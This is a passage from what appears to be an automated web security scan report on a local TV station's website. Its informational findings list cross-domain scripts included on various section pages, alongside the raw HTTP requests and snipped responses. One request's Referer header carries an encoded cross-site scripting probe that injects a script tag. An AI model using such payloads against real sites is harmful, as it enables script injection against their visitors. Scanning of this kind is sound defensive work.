http://common.onset.freedom.com/fi/analytics/cms/?scode=wrgb&domain=www.cbs6albany.com&ctype=section&shier=custsvc&ghier=custsvc&us=anonymous
http://edge.quantserve.com/quant.js

Request

GET /sections/sales/ HTTP/1.1
Host: www.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; s_nr=1296236234802; SC_LINKS=%5B%5BB%5D%5D; cf=1; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:23:38 GMT
Server: Apache
Cache-Control: max-age=600
Expires: Sat, 29 Jan 2011 04:33:38 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 24699

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>

...[SNIP]...
<div id="stats"><script language="javascript" src="http://common.onset.freedom.com/fi/analytics/cms/?scode=wrgb&domain=www.cbs6albany.com&ctype=section&shier=custsvc&ghier=custsvc&us=anonymous"></script>
...[SNIP]...
<div align="center" class="infocenter newstext">
<script type="text/javascript" src="http://b3.caspio.com/scripts/e1.js"></script>
...[SNIP]...
<div class="fi_adsense">

<script type='text/javascript' src='http://common.onset.freedom.com/fi/adsense/?scode=wrgb&placement=section'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
</script><script src="http://an.tacoda.net/an/15135/slf.js" type="text/javascript"></script>
...[SNIP]...

18.799. http://www.cbs6albany.com/sections/satellitewaivers/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cbs6albany.com
Path:	/sections/satellitewaivers/

Issue detail

The response dynamically includes the following scripts from other domains:

http://an.tacoda.net/an/15135/slf.js
http://common.onset.freedom.com/fi/adsense/?scode=wrgb&placement=section
http://common.onset.freedom.com/fi/analytics/cms/?scode=wrgb&domain=www.cbs6albany.com&ctype=section&shier=custsvc&ghier=custsvc&us=anonymous
http://common.onset.freedom.com/js/zvents-mini-base.js
http://common.onset.freedom.com/js/zvents-mini-custom.js
http://edge.quantserve.com/quant.js

Request

GET /sections/satellitewaivers/ HTTP/1.1
Host: www.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; s_nr=1296236234802; SC_LINKS=%5B%5BB%5D%5D; cf=1; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:25:09 GMT
Server: Apache
Cache-Control: max-age=600
Expires: Sat, 29 Jan 2011 04:35:09 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 42282

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
...[SNIP]...
<div id="stats"><script language="javascript" src="http://common.onset.freedom.com/fi/analytics/cms/?scode=wrgb&domain=www.cbs6albany.com&ctype=section&shier=custsvc&ghier=custsvc&us=anonymous"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://common.onset.freedom.com/js/zvents-mini-base.js"></script>
<script type="text/javascript" src="http://common.onset.freedom.com/js/zvents-mini-custom.js"></script>
...[SNIP]...
<div class="fi_adsense">

<script type='text/javascript' src='http://common.onset.freedom.com/fi/adsense/?scode=wrgb&placement=section'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
</script><script src="http://an.tacoda.net/an/15135/slf.js" type="text/javascript"></script>
...[SNIP]...

18.800. http://www.cbs6albany.com/sections/schoolclosures/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cbs6albany.com
Path:	/sections/schoolclosures/

Issue detail

The response dynamically includes the following scripts from other domains:

http://an.tacoda.net/an/15135/slf.js
http://common.onset.freedom.com/fi/adsense/?scode=wrgb&placement=section
http://common.onset.freedom.com/fi/analytics/cms/?scode=wrgb&domain=www.cbs6albany.com&ctype=section&shier=life%7Ceducation%7Cschools&ghier=life%7Ceducation%7Cschools&us=anonymous
http://edge.quantserve.com/quant.js

Request

GET /sections/schoolclosures/ HTTP/1.1
Host: www.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; s_nr=1296236234802; SC_LINKS=%5B%5BB%5D%5D; cf=1; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:21:15 GMT
Server: Apache
Cache-Control: max-age=600
Expires: Sat, 29 Jan 2011 04:31:15 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 37793

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>

...[SNIP]...
<div id="stats"><script language="javascript" src="http://common.onset.freedom.com/fi/analytics/cms/?scode=wrgb&domain=www.cbs6albany.com&ctype=section&shier=life%7Ceducation%7Cschools&ghier=life%7Ceducation%7Cschools&us=anonymous"></script>
...[SNIP]...
<div class="fi_adsense">

<script type='text/javascript' src='http://common.onset.freedom.com/fi/adsense/?scode=wrgb&placement=section'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
</script><script src="http://an.tacoda.net/an/15135/slf.js" type="text/javascript"></script>
...[SNIP]...

18.801. http://www.cbs6albany.com/sections/schoolwatch/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cbs6albany.com
Path:	/sections/schoolwatch/

Issue detail

The response dynamically includes the following scripts from other domains:

http://an.tacoda.net/an/15135/slf.js
http://common.onset.freedom.com/fi/adsense/?scode=wrgb&placement=section
http://common.onset.freedom.com/fi/analytics/cms/?scode=wrgb&domain=www.cbs6albany.com&ctype=section&shier=life%7Ceducation&ghier=life%7Ceducation&us=anonymous
http://edge.quantserve.com/quant.js

Request

GET /sections/schoolwatch/ HTTP/1.1
Host: www.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; s_nr=1296236234802; SC_LINKS=%5B%5BB%5D%5D; cf=1; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:19:31 GMT
Server: Apache
Cache-Control: max-age=600
Expires: Sat, 29 Jan 2011 04:29:31 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 24672

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>

...[SNIP]...
<div id="stats"><script language="javascript" src="http://common.onset.freedom.com/fi/analytics/cms/?scode=wrgb&domain=www.cbs6albany.com&ctype=section&shier=life%7Ceducation&ghier=life%7Ceducation&us=anonymous"></script>
...[SNIP]...
<div class="fi_adsense">

<script type='text/javascript' src='http://common.onset.freedom.com/fi/adsense/?scode=wrgb&placement=section'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
</script><script src="http://an.tacoda.net/an/15135/slf.js" type="text/javascript"></script>
...[SNIP]...

18.802. http://www.cbs6albany.com/sections/sitemap/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cbs6albany.com
Path:	/sections/sitemap/

Issue detail

The response dynamically includes the following scripts from other domains:

http://an.tacoda.net/an/15135/slf.js
http://common.onset.freedom.com/fi/adsense/?scode=wrgb&placement=section
http://common.onset.freedom.com/fi/analytics/cms/?scode=wrgb&domain=www.cbs6albany.com&ctype=section&shier=custsvc&ghier=custsvc&us=anonymous
http://edge.quantserve.com/quant.js

Request

GET /sections/sitemap/ HTTP/1.1
Host: www.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; s_nr=1296236234802; SC_LINKS=%5B%5BB%5D%5D; cf=1; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:18:40 GMT
Server: Apache
Cache-Control: max-age=600
Expires: Sat, 29 Jan 2011 04:28:40 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 40015

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>

...[SNIP]...
<div id="stats"><script language="javascript" src="http://common.onset.freedom.com/fi/analytics/cms/?scode=wrgb&domain=www.cbs6albany.com&ctype=section&shier=custsvc&ghier=custsvc&us=anonymous"></script>
...[SNIP]...
<div class="fi_adsense">

<script type='text/javascript' src='http://common.onset.freedom.com/fi/adsense/?scode=wrgb&placement=section'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
</script><script src="http://an.tacoda.net/an/15135/slf.js" type="text/javascript"></script>
...[SNIP]...

18.803. http://www.cbs6albany.com/sections/sp-alerts/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cbs6albany.com
Path:	/sections/sp-alerts/

Issue detail

The response dynamically includes the following scripts from other domains:

http://an.tacoda.net/an/15135/slf.js
http://common.onset.freedom.com/fi/adsense/?scode=wrgb&placement=section
http://common.onset.freedom.com/fi/analytics/cms/?scode=wrgb&domain=www.cbs6albany.com&ctype=section&shier=special&ghier=special&us=anonymous
http://edge.quantserve.com/quant.js

Request

GET /sections/sp-alerts/ HTTP/1.1
Host: www.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; s_nr=1296236234802; SC_LINKS=%5B%5BB%5D%5D; cf=1; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:21:05 GMT
Server: Apache
Cache-Control: max-age=600
Expires: Sat, 29 Jan 2011 04:31:05 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 37038

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>

...[SNIP]...
<div id="stats"><script language="javascript" src="http://common.onset.freedom.com/fi/analytics/cms/?scode=wrgb&domain=www.cbs6albany.com&ctype=section&shier=special&ghier=special&us=anonymous"></script>
...[SNIP]...
<div class="fi_adsense">

<script type='text/javascript' src='http://common.onset.freedom.com/fi/adsense/?scode=wrgb&placement=section'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
</script><script src="http://an.tacoda.net/an/15135/slf.js" type="text/javascript"></script>
...[SNIP]...

18.804. http://www.cbs6albany.com/sections/thirdParty/iframe_footer/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cbs6albany.com
Path:	/sections/thirdParty/iframe_footer/

Issue detail

The response dynamically includes the following scripts from other domains:

http://common.onset.freedom.com/fi/adsense/?scode=wrgb&placement=section
http://edge.quantserve.com/quant.js

Request

GET /sections/thirdParty/iframe_footer/ HTTP/1.1
Host: www.cbs6albany.com
Proxy-Connection: keep-alive
Referer: http://events.cbs6albany.com/?376e5%22%3E%3Cscript%3Ealert(1)%3C/script%3Ea7771aeaee3=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SC_LINKS=%5B%5BB%5D%5D; s_vnum=1298828234584%26vn%3D1; s_invisit=true; c_m=NoneDirect%20LoadDirect%20Load; cf=1; s_cc=true; s_lastvisit=1296236234801; s_nr=1296236234802; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_w=1296367200803%26vn%3D1; sinvisit_w=true; s_vnum_m=1296540000804%26vn%3D1; sinvisit_m=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 17:37:28 GMT
Server: Apache
Cache-Control: max-age=600
Expires: Fri, 28 Jan 2011 17:47:28 GMT
Vary: Accept-Encoding,User-Agent
Content-Type: text/html
Content-Length: 7435

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>

...[SNIP]...
<div class="fi_adsense">

<script type='text/javascript' src='http://common.onset.freedom.com/fi/adsense/?scode=wrgb&placement=section'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.805. http://www.cbs6albany.com/sections/thirdParty/iframe_header/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cbs6albany.com
Path:	/sections/thirdParty/iframe_header/

Issue detail

The response dynamically includes the following script from another domain:

http://common.onset.freedom.com/fi/analytics/cms/?scode=wrgb&domain=cbs6albany.oodle.com&ctype=&cname=section&shier=classified&ghier=classified&trackbyurl=wrgb&usetitle=true&us=anonymous

Request

Response

18.806. http://www.cbs6albany.com/sections/traffic-events/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cbs6albany.com
Path:	/sections/traffic-events/

Issue detail

The response dynamically includes the following scripts from other domains:

http://an.tacoda.net/an/15135/slf.js
http://common.onset.freedom.com/fi/adsense/?scode=wrgb&placement=section
http://common.onset.freedom.com/fi/analytics/cms/?scode=wrgb&domain=www.cbs6albany.com&ctype=section&shier=traffic&ghier=traffic&us=anonymous
http://common.onset.freedom.com/js/zvents-mini-base.js
http://common.onset.freedom.com/js/zvents-mini-custom.js
http://edge.quantserve.com/quant.js

Request

GET /sections/traffic-events/ HTTP/1.1
Host: www.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; s_nr=1296236234802; SC_LINKS=%5B%5BB%5D%5D; cf=1; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:20:32 GMT
Server: Apache
Cache-Control: max-age=600
Expires: Sat, 29 Jan 2011 04:30:32 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 41994

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
...[SNIP]...
<div id="stats"><script language="javascript" src="http://common.onset.freedom.com/fi/analytics/cms/?scode=wrgb&domain=www.cbs6albany.com&ctype=section&shier=traffic&ghier=traffic&us=anonymous"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://common.onset.freedom.com/js/zvents-mini-base.js"></script>
<script type="text/javascript" src="http://common.onset.freedom.com/js/zvents-mini-custom.js"></script>
...[SNIP]...
<div class="fi_adsense">

<script type='text/javascript' src='http://common.onset.freedom.com/fi/adsense/?scode=wrgb&placement=section'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
</script><script src="http://an.tacoda.net/an/15135/slf.js" type="text/javascript"></script>
...[SNIP]...

18.807. http://www.cbs6albany.com/sections/traffic/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cbs6albany.com
Path:	/sections/traffic/

Issue detail

The response dynamically includes the following scripts from other domains:

http://an.tacoda.net/an/15135/slf.js
http://common.onset.freedom.com/fi/adsense/?scode=wrgb&placement=section
http://common.onset.freedom.com/fi/analytics/cms/?scode=wrgb&domain=www.cbs6albany.com&ctype=section&shier=traffic&ghier=traffic&us=anonymous
http://edge.quantserve.com/quant.js

Request

GET /sections/traffic/ HTTP/1.1
Host: www.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; s_nr=1296236234802; SC_LINKS=%5B%5BB%5D%5D; cf=1; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:20:07 GMT
Server: Apache
Cache-Control: max-age=600
Expires: Sat, 29 Jan 2011 04:30:07 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 28890

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>

...[SNIP]...
<div id="stats"><script language="javascript" src="http://common.onset.freedom.com/fi/analytics/cms/?scode=wrgb&domain=www.cbs6albany.com&ctype=section&shier=traffic&ghier=traffic&us=anonymous"></script>
...[SNIP]...
<div class="fi_adsense">

<script type='text/javascript' src='http://common.onset.freedom.com/fi/adsense/?scode=wrgb&placement=section'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
</script><script src="http://an.tacoda.net/an/15135/slf.js" type="text/javascript"></script>
...[SNIP]...

18.808. http://www.cbs6albany.com/sections/tvlistings/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cbs6albany.com
Path:	/sections/tvlistings/

Issue detail

The response dynamically includes the following scripts from other domains:

http://an.tacoda.net/an/15135/slf.js
http://common.onset.freedom.com/fi/adsense/?scode=wrgb&placement=section
http://common.onset.freedom.com/fi/analytics/cms/?scode=wrgb&domain=www.cbs6albany.com&ctype=section&shier=entertainment%7Ctv&ghier=entertainment%7Ctv&us=anonymous
http://edge.quantserve.com/quant.js

Request

GET /sections/tvlistings/ HTTP/1.1
Host: www.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; s_nr=1296236234802; SC_LINKS=%5B%5BB%5D%5D; cf=1; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:20:33 GMT
Server: Apache
Cache-Control: max-age=600
Expires: Sat, 29 Jan 2011 04:30:33 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 23638

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>

...[SNIP]...
<div id="stats"><script language="javascript" src="http://common.onset.freedom.com/fi/analytics/cms/?scode=wrgb&domain=www.cbs6albany.com&ctype=section&shier=entertainment%7Ctv&ghier=entertainment%7Ctv&us=anonymous"></script>
...[SNIP]...
<div class="fi_adsense">

<script type='text/javascript' src='http://common.onset.freedom.com/fi/adsense/?scode=wrgb&placement=section'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
</script><script src="http://an.tacoda.net/an/15135/slf.js" type="text/javascript"></script>
...[SNIP]...

18.809. http://www.cbs6albany.com/sections/videocopies/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cbs6albany.com
Path:	/sections/videocopies/

Issue detail

The response dynamically includes the following scripts from other domains:

http://an.tacoda.net/an/15135/slf.js
http://common.onset.freedom.com/fi/adsense/?scode=wrgb&placement=section
http://common.onset.freedom.com/fi/analytics/cms/?scode=wrgb&domain=www.cbs6albany.com&ctype=section&shier=custsvc&ghier=custsvc&us=anonymous
http://common.onset.freedom.com/js/zvents-mini-base.js
http://common.onset.freedom.com/js/zvents-mini-custom.js
http://edge.quantserve.com/quant.js

Request

GET /sections/videocopies/ HTTP/1.1
Host: www.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; s_nr=1296236234802; SC_LINKS=%5B%5BB%5D%5D; cf=1; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:23:50 GMT
Server: Apache
Cache-Control: max-age=600
Expires: Sat, 29 Jan 2011 04:33:50 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 42187

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
...[SNIP]...
<div id="stats"><script language="javascript" src="http://common.onset.freedom.com/fi/analytics/cms/?scode=wrgb&domain=www.cbs6albany.com&ctype=section&shier=custsvc&ghier=custsvc&us=anonymous"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://common.onset.freedom.com/js/zvents-mini-base.js"></script>
<script type="text/javascript" src="http://common.onset.freedom.com/js/zvents-mini-custom.js"></script>
...[SNIP]...
<div class="fi_adsense">

<script type='text/javascript' src='http://common.onset.freedom.com/fi/adsense/?scode=wrgb&placement=section'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
</script><script src="http://an.tacoda.net/an/15135/slf.js" type="text/javascript"></script>
...[SNIP]...

18.810. http://www.cbs6albany.com/sections/weather/7day/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cbs6albany.com
Path:	/sections/weather/7day/

Issue detail

The response dynamically includes the following scripts from other domains:

http://an.tacoda.net/an/15135/slf.js
http://common.onset.freedom.com/fi/adsense/?scode=wrgb&placement=section
http://common.onset.freedom.com/fi/analytics/cms/?scode=wrgb&domain=www.cbs6albany.com&ctype=section&shier=weather%7Cforecast&ghier=weather%7Cforecast&us=anonymous
http://edge.quantserve.com/quant.js

Request

GET /sections/weather/7day/ HTTP/1.1
Host: www.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; s_nr=1296236234802; SC_LINKS=%5B%5BB%5D%5D; cf=1; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:18:51 GMT
Server: Apache
Cache-Control: max-age=600
Expires: Sat, 29 Jan 2011 04:28:51 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 24587

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>

...[SNIP]...
<div id="stats"><script language="javascript" src="http://common.onset.freedom.com/fi/analytics/cms/?scode=wrgb&domain=www.cbs6albany.com&ctype=section&shier=weather%7Cforecast&ghier=weather%7Cforecast&us=anonymous"></script>
...[SNIP]...
<div class="fi_adsense">

<script type='text/javascript' src='http://common.onset.freedom.com/fi/adsense/?scode=wrgb&placement=section'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
</script><script src="http://an.tacoda.net/an/15135/slf.js" type="text/javascript"></script>
...[SNIP]...

18.811. http://www.cbs6albany.com/sections/web-links/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cbs6albany.com
Path:	/sections/web-links/

Issue detail

The response dynamically includes the following scripts from other domains:

http://an.tacoda.net/an/15135/slf.js
http://common.onset.freedom.com/fi/adsense/?scode=wrgb&placement=section
http://common.onset.freedom.com/fi/analytics/cms/?scode=wrgb&domain=www.cbs6albany.com&ctype=section&shier=Web Links&ghier=community%7Clinks&us=anonymous
http://common.onset.freedom.com/js/zvents-mini-base.js
http://common.onset.freedom.com/js/zvents-mini-custom.js
http://edge.quantserve.com/quant.js

Request

GET /sections/web-links/ HTTP/1.1
Host: www.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; s_nr=1296236234802; SC_LINKS=%5B%5BB%5D%5D; cf=1; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:19:18 GMT
Server: Apache
Cache-Control: max-age=600
Expires: Sat, 29 Jan 2011 04:29:18 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 59475

